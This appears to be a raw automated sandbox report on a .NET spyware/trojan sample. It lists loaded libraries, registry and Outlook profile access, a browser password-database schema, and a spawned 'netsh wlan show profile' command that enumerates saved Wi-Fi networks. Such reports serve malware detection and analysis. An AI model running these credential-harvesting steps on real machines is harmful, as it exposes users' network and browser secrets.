Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF8871200A0	2_2_00007FF8871200A0
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF8871200D8	2_2_00007FF8871200D8
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF88714EDFA	2_2_00007FF88714EDFA
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF88714DC55	2_2_00007FF88714DC55
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887140B1B	2_2_00007FF887140B1B
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887151AFB	2_2_00007FF887151AFB
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887151AC7	2_2_00007FF887151AC7
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF88713BACC	2_2_00007FF88713BACC
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887151AD3	2_2_00007FF887151AD3

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000000.1461024135.0000000000372000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilename3mpiric41.exeD vs 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Binary or memory string: OriginalFilename3mpiric41.exeD vs 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/19@4/3

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Mutant created: \Sessions\1\BaseNamedObjects\424505
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_03

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

File created: C:\Users\user\AppData\Local\Temp\3nxxd8pi.default-release

Jump to behavior

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.00000000027DD000.00000004.00000800.00020000.00000000.sdmp, tmpB88C.tmp.dat.2.dr, tmpB1FB.tmp.dat.2.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Virustotal: Detection: 43%

Source: unknown	Process created: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe "C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe"
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All	Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Static PE information: 0xAC136B0D [Sat Jun 25 19:35:41 2061 UTC]

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF886FD7569 push ebx; iretd	2_2_00007FF886FD756A
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF886FD812B push ebx; ret	2_2_00007FF886FD816A
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF886FDAD45 push FFFFFFE9h; retf	2_2_00007FF886FDAD51
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF886FDAA95 push ebx; iretd	2_2_00007FF886FDAA9A
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF886FD7967 push ebx; retf	2_2_00007FF886FD796A
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887143628 push eax; retf	2_2_00007FF887143629

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
